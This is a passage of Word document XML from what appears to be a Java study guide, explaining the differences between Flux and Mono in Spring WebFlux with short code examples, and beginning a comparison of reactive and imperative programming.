          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Want a real-world use case example with DB or REST call using Flux?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42118BEC"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AC547C6">
          <v:rect id="_x0000_i2253" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A9679A" w14:textId="32B8CCF2"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492" w:name="_Toc196307972"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Flux differ from Mono</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="492"/>
    </w:p>
    <w:p w14:paraId="12A0DE94" w14:textId="29F7FB96" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="002951F8" w:rsidP="00BF46DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Differences Between Flux and Mono in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40878FEF"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Both Flux and Mono are </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> types in Spring WebFlux, but they are used for different purposes. Let's break down the key differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA99832" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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1B59EE4">
          <v:rect id="_x0000_i2254" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24407DDF" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="002951F8"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1. Emitted Elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5929A755"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Mono:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Represents a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single value</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or an empty result (i.e., 0 or 1 value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E05411F"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Flux:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Represents </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple values</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a sequence of values (i.e., 0 to N values).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA0028E"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078EAF39"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Mono for a single item:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E4C293"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Mono&lt;String&gt; mono = Mono.just("Hello");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0942F6"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Flux for multiple items:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745AD518"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Flux&lt;String&gt; flux = Flux.just("A", "B", "C");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BADF221" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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F9D7814">
          <v:rect id="_x0000_i2255" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2EB1EF" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="002951F8"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2. Use Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096CDE6B"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Mono:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used when you expect </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a single value</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no value at all</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (empty).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309D5204" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="002951F8"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Common use cases</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Single record queries, HTTP request/response, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E601E33"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Flux:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used when you expect </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple values</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68734D96" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="002951F8"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Common use cases</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Streaming data, fetching collections of items, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A746323" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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147CA6">
          <v:rect id="_x0000_i2256" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0C01EB" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="002951F8"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3. Backpressure Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB263CC"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Mono:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Does not deal with backpressure because it only handles one value (or none).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAB5143"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Flux:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Supports backpressure since it can emit multiple values, and subscribers can specify how much data they want to handle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A597478" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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7FE96A4">
          <v:rect id="_x0000_i2257" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D606A0" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="002951F8"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4. Completion Signal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C8D23D"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lastRenderedPageBreak/>
        <w:t>Mono:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Signals completion after emitting the value (or signaling an empty result). It can either </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complete successfully</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fail with an error</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303624C9"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Flux:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Signals completion after emitting all values in the stream. It can also emit values indefinitely until an explicit stop condition is met.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282DF675" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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CE5DD1B">
          <v:rect id="_x0000_i2258" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0654AC44" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="002951F8"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5. Common Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7961644C"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Mono:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Since Mono deals with a single result, it has operations like then, block, subscribe, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2851AF46"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Flux:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> For multiple results, Flux supports operations like map, flatMap, filter, take, mergeWith, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BDC70D" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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960323E">
          <v:rect id="_x0000_i2259" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8A2785" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="002951F8"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6. Code Example Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1B0570"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Mono Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAC77B9"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Mono&lt;String&gt; mono = Mono.just("Single Value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C79CC79"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mono.subscribe(System.out::println);  // Output: Single Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A616C0"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Flux Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C38098"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Flux&lt;String&gt; flux = Flux.just("A", "B", "C");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C290D93"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flux.subscribe(System.out::println);  // Output: A, B, C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFAAFBF" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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A7461C5">
          <v:rect id="_x0000_i2260" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="75350913" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="002951F8"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7. Duration of Subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAA242D"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Mono:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Typically used for single, short-lived interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303A9902"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Flux:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Typically used for continuous, long-lived interactions like streaming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530CA037" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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DD795F6">
          <v:rect id="_x0000_i2261" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="266B4A8E" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="002951F8"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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D17E4A0"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Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0 or 1 element (for single-value scenarios)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AAD36D"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Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0 to N elements (for multiple value scenarios)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7DB577" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="002951F8"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when expecting a single result, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when expecting multiple results or streaming data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447F860D"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6C3A9A1">
          <v:rect id="_x0000_i2262" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B46892C" w14:textId="212507E2"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493" w:name="_Toc196307973"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does reactive programming differ from imperative programming</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="493"/>
    </w:p>
    <w:p w14:paraId="7A73E91C" w14:textId="1CD59E7D" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="005164BC" w:rsidP="00BF46DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Differences Between Reactive Programming and Imperative Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC2DB92"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Imperative Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are two different paradigms for handling the flow of logic and data in programs. They differ significantly in how they approach execution, concurrency, and managing events or data streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6E4862" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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F3191B">
          <v:rect id="_x0000_i2263" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADB90FF" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="005164BC"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1. Execution Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345665B9"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Imperative Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718930F0"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In </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>imperative programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the focus is on </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the task is performed (step-by-step instructions). You explicitly define the sequence of operations that need to be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37275303"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Writing a loop or calling functions to process data in a fixed sequence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA85C40"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Execution is synchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (you wait for each operation to complete before moving to the next).</w:t>
      </w:r>
    </w:p>
